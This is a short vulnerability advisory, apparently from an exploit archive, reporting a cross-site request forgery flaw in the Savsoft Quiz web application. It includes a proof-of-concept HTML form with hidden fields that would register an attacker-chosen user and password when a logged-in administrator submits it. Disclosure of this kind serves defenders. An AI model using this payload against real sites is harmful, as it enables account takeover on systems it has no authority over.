Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

[+] Author: TUNISIAN CYBER [+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability [+] Date: 24-02-2014 [+] Category: WebApp [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-352 [+] Vendor: [+] Friendly Sites:, 1.OVERVIEW: SuSavsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability. 2.Version: All 3.Background: Savsoft Quiz is a php based web application to create and manage online quiz, test, exam on your web server or hosting 4.Proof Of Concept: <form method="POST" name="form0" action=""> <input type="hidden" name="username" value="miuter12"/> <input type="hidden" name="first_name" value="TUNISIAN"/> <input type="hidden" name="last_name" value="CYBER"/> <input type="hidden" name="user_email" value=""/> <input type="hidden" name="user_password" value="p@assw0rd"/> <input type="hidden" name="confirm_password" value="p@assw0rd"/> <input type="hidden" name="user_credit" value="blank"/> <input type="hidden" name="user_group" value="group1"/> <input type="submit" value="Click ME!"/> </form> </body> </html> 5.Solution(s): n/a 6.TIME-LINE: 2014-02-22: Vulnerability was discovered. 2014-02-22:Contact with vendor 2014-02-23:No Reply 2014-02-24:Vulnerability Released 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top